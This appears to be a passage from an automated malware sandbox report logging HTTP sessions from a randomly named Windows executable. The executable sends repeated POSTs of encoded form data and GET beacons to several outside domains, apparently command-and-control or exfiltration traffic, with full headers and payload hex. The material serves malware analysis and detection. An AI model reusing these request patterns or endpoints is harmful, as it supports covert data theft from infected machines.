                                                                              Data Raw: 69 72 43 78 6c 36 3d 59 56 30 56 67 68 32 4c 69 74 56 32 6f 65 51 62 4d 2b 51 61 53 43 77 44 45 6f 52 59 73 75 79 72 75 52 31 74 56 6c 45 6c 6f 68 64 53 7a 64 71 64 37 57 63 43 77 44 49 73 4c 66 4e 30 41 38 70 62 45 48 58 50 4d 64 34 64 31 59 54 50 42 42 73 78 41 46 37 47 6f 57 4a 65 62 39 52 69 77 39 42 78 4b 72 58 76 6e 35 51 54 43 2b 74 47 41 4f 59 4d 34 63 4a 73 58 66 75 34 35 79 48 6f 37 4e 64 4d 54 70 32 68 38 49 79 5a 4a 61 32 55 48 7a 35 58 4c 70 5a 57 35 49 38 45 73 44 59 52 63 32 50 67 74 69 6d 6e 7a 63 70 5a 50 63 72 43 59 76 72 39 70 32 34 71 75 75 6f 70 32 54 46 75 69 59 37 71 44 42 6c 64 4e 7a 67 3d
                                                                              Data Ascii: irCxl6=YV0Vgh2LitV2oeQbM+QaSCwDEoRYsuyruR1tVlElohdSzdqd7WcCwDIsLfN0A8pbEHXPMd4d1YTPBBsxAF7GoWJeb9Riw9BxKrXvn5QTC+tGAOYM4cJsXfu45yHo7NdMTp2h8IyZJa2UHz5XLpZW5I8EsDYRc2PgtimnzcpZPcrCYvr9p24quuop2TFuiY7qDBldNzg=
                                                                              Jan 10, 2025 18:56:03.712727070 CET582INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Fri, 10 Jan 2025 17:56:03 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-backend: phl-web-01
                                                                              X-Frontend: phl-frontend-01
                                                                              X-Trace-Id: ti_f42fbc03a3cc6ced93178f8b8bd54dda
                                                                              Content-Encoding: br
                                                                              Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.849734103.168.172.37805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:05.732431889 CET754OUTPOST /up4e/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.lucelight.info
                                                                              Origin: http://www.lucelight.info
                                                                              Referer: http://www.lucelight.info/up4e/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 59 56 30 56 67 68 32 4c 69 74 56 32 36 75 41 62 4c 66 51 61 58 69 77 41 4c 49 52 59 33 65 79 6e 75 52 4a 74 56 6b 42 75 72 58 4e 53 32 4e 61 64 34 58 63 43 78 44 49 73 44 2f 4e 31 4f 63 70 71 45 48 61 38 4d 65 67 64 31 65 2f 50 42 45 6f 78 41 79 48 42 70 47 4a 63 53 64 52 6b 2f 64 42 78 4b 72 58 76 6e 35 73 70 43 39 64 47 41 2b 6f 4d 2b 35 31 76 4c 76 75 35 2b 79 48 6f 74 4e 64 49 54 70 32 50 38 4a 75 6a 4a 5a 43 55 48 32 64 58 4c 38 31 58 33 49 38 43 6d 6a 59 46 56 6b 2f 73 6f 6c 6d 79 78 4f 34 2b 4e 4f 6a 35 5a 5a 61 58 7a 55 77 73 74 75 41 43 32 51 74 59 6e 76 6d 43 5a 69 31 74 54 6b 31 43 49 51 56 33 79 49 6c 4f 4a 44 70 4e 4b 33 65 53 53 55 6e 4e
                                                                              Data Ascii: irCxl6=YV0Vgh2LitV26uAbLfQaXiwALIRY3eynuRJtVkBurXNS2Nad4XcCxDIsD/N1OcpqEHa8Megd1e/PBEoxAyHBpGJcSdRk/dBxKrXvn5spC9dGA+oM+51vLvu5+yHotNdITp2P8JujJZCUH2dXL81X3I8CmjYFVk/solmyxO4+NOj5ZZaXzUwstuAC2QtYnvmCZi1tTk1CIQV3yIlOJDpNK3eSSUnN


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.849735103.168.172.37805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:08.277815104 CET1771OUTPOST /up4e/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.lucelight.info
                                                                              Origin: http://www.lucelight.info
                                                                              Referer: http://www.lucelight.info/up4e/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 59 56 30 56 67 68 32 4c 69 74 56 32 36 75 41 62 4c 66 51 61 58 69 77 41 4c 49 52 59 33 65 79 6e 75 52 4a 74 56 6b 42 75 72 58 46 53 32 63 36 64 36 77 49 43 6a 7a 49 73 66 76 4e 6f 4f 63 70 33 45 48 43 77 4d 65 73 6a 31 62 6a 50 44 69 55 78 47 44 48 42 67 47 4a 63 51 64 52 6c 77 39 42 65 4b 71 37 6a 6e 2f 4d 70 43 39 64 47 41 34 6b 4d 35 73 4a 76 59 2f 75 34 35 79 48 65 37 4e 64 67 54 70 4f 35 38 4a 61 4a 4a 71 61 55 48 57 4e 58 49 4f 74 58 37 49 38 41 68 6a 5a 43 56 6b 79 79 6f 6a 44 63 78 50 39 5a 4e 4e 44 35 55 4f 33 59 72 67 38 61 76 4d 73 79 36 52 78 76 72 76 69 78 54 77 46 69 50 31 6c 30 41 32 4a 43 77 4b 74 61 63 42 77 54 56 78 4f 61 43 42 44 44 6c 6b 66 46 32 64 51 2b 79 2b 42 70 36 6f 49 6c 37 76 69 41 41 36 30 39 36 59 42 4e 43 73 43 53 57 6d 57 42 42 33 79 4f 65 35 33 73 44 67 51 70 53 6c 72 73 65 6a 57 45 6f 6f 4c 6a 74 4c 67 79 4d 56 4f 71 38 79 54 45 55 2b 2b 42 5a 6e 42 70 32 50 46 4c 4d 61 46 49 59 69 63 6a 64 37 45 7a 6e 73 61 53 44 67 6b 59 7a 69 61 38 6d 53 37 [TRUNCATED]
                                                                              Data Ascii: irCxl6=YV0Vgh2LitV26uAbLfQaXiwALIRY3eynuRJtVkBurXFS2c6d6wICjzIsfvNoOcp3EHCwMesj1bjPDiUxGDHBgGJcQdRlw9BeKq7jn/MpC9dGA4kM5sJvY/u45yHe7NdgTpO58JaJJqaUHWNXIOtX7I8AhjZCVkyyojDcxP9ZNND5UO3Yrg8avMsy6RxvrvixTwFiP1l0A2JCwKtacBwTVxOaCBDDlkfF2dQ+y+Bp6oIl7viAA6096YBNCsCSWmWBB3yOe53sDgQpSlrsejWEooLjtLgyMVOq8yTEU++BZnBp2PFLMaFIYicjd7EznsaSDgkYzia8mS7rVptns6R+rkdsTWnYG6bP66HHKRUefFZpp6eYEh2uQcltvsZnLS56A3lMFHIOtPEBBNAqoo6eXBBsMqwQ+fLl2WvlHteAQJcYcbH+FXnTowVpW0o2tgg2ucC7momerS2aJFzEiFJmX7s3wg4jVS6BXdbdrX3o1ShE2d/5ayIWTcRGo2VimYN2KL717L5GfILwzL/YBhLrx/wnUdV6nVOTt8HalwvX51fZexOCBTl482p+LraBH1XRbz+EryjRRqUBKiPi9KkYvBjkN3edtCSx+KicOKWD4J1pc6TTRqA8JjDu3GVlv/b7dk3/1nJ+1dFb1zebQ1gGBURzMdGsvcx4Q0L0gjVH0Xzb0sFlbohDgoWQ9MbdrjFJ61wPS/6fBN+iUII0JcEOKessvFS4nt3N6YqDDwSBhJVNTYGR11n3jnPLzZlBaD+dTZ5hZklmedR+mCV96ERpBiNTHlraNe/NtKPH/av+30dMMKTpq0CBchAWa0+AkEMfGgTWgr4agdQUTllrR9X174On4A5fJeboQRFABV/YVcmdivpQndQuEFYB18FmG2SgjhOrrK+8FH+wzEPtXe3ayzMheAtmS74Leg7An7la+PwrJayBewSFAuplwoZsi83sEN4OZOWmMX2RDmclVVV6Y8YQh57p22uAwYxsnekKf9HvD [TRUNCATED]
                                                                              Jan 10, 2025 18:56:08.844739914 CET582INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Fri, 10 Jan 2025 17:56:08 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              x-backend: phl-web-01
                                                                              X-Frontend: phl-frontend-01
                                                                              X-Trace-Id: ti_bc98a39741c8df13dc032603cfc1245b
                                                                              Content-Encoding: br
                                                                              Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.849736103.168.172.37805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:10.814485073 CET470OUTGET /up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.lucelight.info
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:56:11.365905046 CET808INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Fri, 10 Jan 2025 17:56:11 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Content-Length: 544
                                                                              Connection: close
                                                                              x-backend: phl-web-01
                                                                              X-Frontend: phl-frontend-01
                                                                              X-Trace-Id: ti_7c6a19c71b3e0f3571897df7b2bf37e6
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.849737188.114.96.3805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:16.420114040 CET746OUTPOST /kf10/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              Origin: http://www.zrichiod-riech.sbs
                                                                              Referer: http://www.zrichiod-riech.sbs/kf10/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 4d 4f 44 58 35 34 52 4f 73 38 50 52 4d 75 30 5a 32 6d 54 76 4f 2b 72 56 59 54 65 71 4f 77 78 73 43 75 42 30 38 43 4f 72 44 65 78 71 37 33 67 6e 56 55 78 62 6e 2b 66 53 68 66 68 4e 74 78 57 35 62 49 53 49 4e 78 35 69 63 72 66 5a 50 63 75 5a 65 42 2f 39 6a 43 2b 66 47 68 65 6b 72 7a 70 51 69 54 71 50 6a 31 61 6f 6d 38 55 5a 39 72 4a 53 5a 45 63 54 65 50 4e 44 38 32 79 72 4b 6e 54 47 76 47 73 4b 70 76 76 48 37 63 4b 4c 56 57 6b 50 6e 30 4c 55 70 68 54 69 33 39 50 48 39 72 61 50 6b 4e 6c 68 6d 6e 6e 70 46 4f 68 4a 79 72 64 43 33 6c 75 48 71 57 50 38 61 6e 76 58 55 46 5a 33 61 6c 2f 52 4a 77 34 3d
                                                                              Data Ascii: irCxl6=MODX54ROs8PRMu0Z2mTvO+rVYTeqOwxsCuB08COrDexq73gnVUxbn+fShfhNtxW5bISINx5icrfZPcuZeB/9jC+fGhekrzpQiTqPj1aom8UZ9rJSZEcTePND82yrKnTGvGsKpvvH7cKLVWkPn0LUphTi39PH9raPkNlhmnnpFOhJyrdC3luHqWP8anvXUFZ3al/RJw4=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.849738188.114.96.3805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:18.977051973 CET766OUTPOST /kf10/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              Origin: http://www.zrichiod-riech.sbs
                                                                              Referer: http://www.zrichiod-riech.sbs/kf10/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 4d 4f 44 58 35 34 52 4f 73 38 50 52 4e 4f 45 5a 77 42 2f 76 4a 65 72 53 47 6a 65 71 45 51 78 6f 43 75 64 30 38 44 62 32 41 6f 4a 71 36 57 51 6e 57 52 64 62 67 2b 66 53 34 76 68 4d 77 42 57 69 62 49 57 71 4e 7a 64 69 63 72 62 5a 50 64 65 5a 65 32 54 38 6a 53 2b 5a 65 52 65 6d 76 7a 70 51 69 54 71 50 6a 31 65 53 6d 39 38 5a 39 62 5a 53 57 46 63 51 58 76 4e 41 30 57 79 72 4f 6e 54 43 76 47 73 6b 70 75 79 73 37 65 43 4c 56 55 4d 50 6e 6c 4c 56 7a 78 54 34 36 64 4f 33 77 6f 6e 6b 67 4e 42 51 6e 31 37 57 47 73 52 6e 33 64 73 6f 74 48 6d 42 70 57 6e 58 61 6b 48 68 52 79 45 66 41 47 76 68 58 6e 76 6c 36 71 67 52 44 41 6f 4f 6d 52 35 35 39 4f 36 56 64 6e 47 59
                                                                              Data Ascii: irCxl6=MODX54ROs8PRNOEZwB/vJerSGjeqEQxoCud08Db2AoJq6WQnWRdbg+fS4vhMwBWibIWqNzdicrbZPdeZe2T8jS+ZeRemvzpQiTqPj1eSm98Z9bZSWFcQXvNA0WyrOnTCvGskpuys7eCLVUMPnlLVzxT46dO3wonkgNBQn17WGsRn3dsotHmBpWnXakHhRyEfAGvhXnvl6qgRDAoOmR559O6VdnGY


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.849739188.114.96.3805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:21.525867939 CET1783OUTPOST /kf10/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              Origin: http://www.zrichiod-riech.sbs
                                                                              Referer: http://www.zrichiod-riech.sbs/kf10/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 4d 4f 44 58 35 34 52 4f 73 38 50 52 4e 4f 45 5a 77 42 2f 76 4a 65 72 53 47 6a 65 71 45 51 78 6f 43 75 64 30 38 44 62 32 41 72 70 71 36 6b 49 6e 55 32 70 62 68 2b 66 53 77 50 68 52 77 42 58 34 62 4d 79 75 4e 7a 68 59 63 75 48 5a 4a 4c 4b 5a 50 30 72 38 74 53 2b 5a 58 78 65 6a 72 7a 70 46 69 54 36 4c 6a 31 75 53 6d 39 38 5a 39 5a 52 53 66 30 63 51 62 50 4e 44 38 32 79 64 4b 6e 54 71 76 47 30 53 70 75 48 58 37 76 69 4c 56 30 63 50 68 58 54 56 72 68 54 2b 70 74 4f 76 77 6f 72 37 67 4e 4e 55 6e 30 50 38 47 76 42 6e 32 4a 52 31 71 6e 61 66 71 6b 33 61 45 57 54 41 63 79 67 45 46 6c 58 50 61 51 58 61 39 50 77 58 43 6d 6f 4f 6a 53 38 62 6e 71 2f 61 62 54 58 59 71 34 2f 52 65 57 6f 2b 53 6e 52 5a 34 72 58 6a 76 4f 32 66 4e 66 47 42 4b 44 46 45 58 79 71 47 58 4f 61 63 46 35 53 70 4c 73 4e 4b 57 67 71 32 44 6e 4a 74 46 69 32 4e 59 4f 4c 6b 2b 30 56 50 4b 63 64 31 7a 47 6e 6b 50 78 68 36 6b 38 44 33 35 6e 46 49 69 33 6e 61 44 45 2f 50 46 44 37 54 72 5a 65 50 39 57 75 61 72 63 4a 64 48 63 77 [TRUNCATED]
                                                                              Data Ascii: irCxl6=MODX54ROs8PRNOEZwB/vJerSGjeqEQxoCud08Db2Arpq6kInU2pbh+fSwPhRwBX4bMyuNzhYcuHZJLKZP0r8tS+ZXxejrzpFiT6Lj1uSm98Z9ZRSf0cQbPND82ydKnTqvG0SpuHX7viLV0cPhXTVrhT+ptOvwor7gNNUn0P8GvBn2JR1qnafqk3aEWTAcygEFlXPaQXa9PwXCmoOjS8bnq/abTXYq4/ReWo+SnRZ4rXjvO2fNfGBKDFEXyqGXOacF5SpLsNKWgq2DnJtFi2NYOLk+0VPKcd1zGnkPxh6k8D35nFIi3naDE/PFD7TrZeP9WuarcJdHcwTH0y1QqZQudOF3DZEIxIZy2RmJzpRP5srflICiYP8+X6tXq495dSbTZZkiGX/BDc7HnWhdEOg7gqxAa/8IEaQDJ2VVS7vvalZHbId3auniqn++ubwRacpfsgabjKeg9pIsZ1TZYnPcLfFl0e6CfQ+z6rFd5NiKLc/fvu7YJ08qARTQQPXfUcXH0nCegcVG3Nu8/WLNEfDZnY7Ang26zOjuWCYNApTAXlIbTGDUyEn2DJBDvHbs9zLhKUYPY6THTtiMkEQ6jjQJO3WCVhKxBma4T5P9r4aYCSDfqHwRsKj3cLSmwuQUxrXk28zEX7N5hcLO+nQ4GCRs3EaYuA6zRgB9cu82nCKHoE88dCnwOpoNAPdpgRp5C5Z7AEaSRSy6ls3o3Xd1D5uLeEppEQ7W+PDs2TuhbixN5PYpBlx6zV/kFdrWfHUZpT4U2WyzZeb39W5nV9NKF/apjC+daIGKgS6LK+4BBIYHTPQwL+Kgx4J2dp5dGsq8bcEyRDKw3EyKMCcIB4jlRp2xOFyQFebviYuMf8o7VY/lvWydWeEhjUSgKZ94qA9mfZsU3BmTrnnRB/yB+60cvpPNCYaI9YVO9YROPdPnB6+ylRWuTIoGtcu+gn5lYrqqbxFxewpXYjHwE5OM9ZaYTLB86rn2bhV0QHZVE51C59nw9CMU [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.849740188.114.96.3805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:24.064799070 CET474OUTGET /kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.zrichiod-riech.sbs
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:57:03.410238981 CET970INHTTP/1.1 522
                                                                              Date: Fri, 10 Jan 2025 17:57:03 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 15
                                                                              Connection: close
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tJcsGfAh8dQx5%2BKklx4Ff1GPhwxP0%2FNbteS%2BOOBbrS5e0xLN%2BgFGSyDkvLg2kT81Um2dHFuhxKCq1ejxq4%2BqmNfVJ5SqYhAdJaOXy%2FYeOA4JjNWZjrtULk1LRSyH4l%2BoHKNMzA%2F2InGn"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Referrer-Policy: same-origin
                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe8b251810c346-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1892&rtt_var=946&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                              Data Ascii: error code: 522


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.84974184.32.84.32805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:57:08.498878002 CET749OUTPOST /3io6/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.absseguridad.online
                                                                              Origin: http://www.absseguridad.online
                                                                              Referer: http://www.absseguridad.online/3io6/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
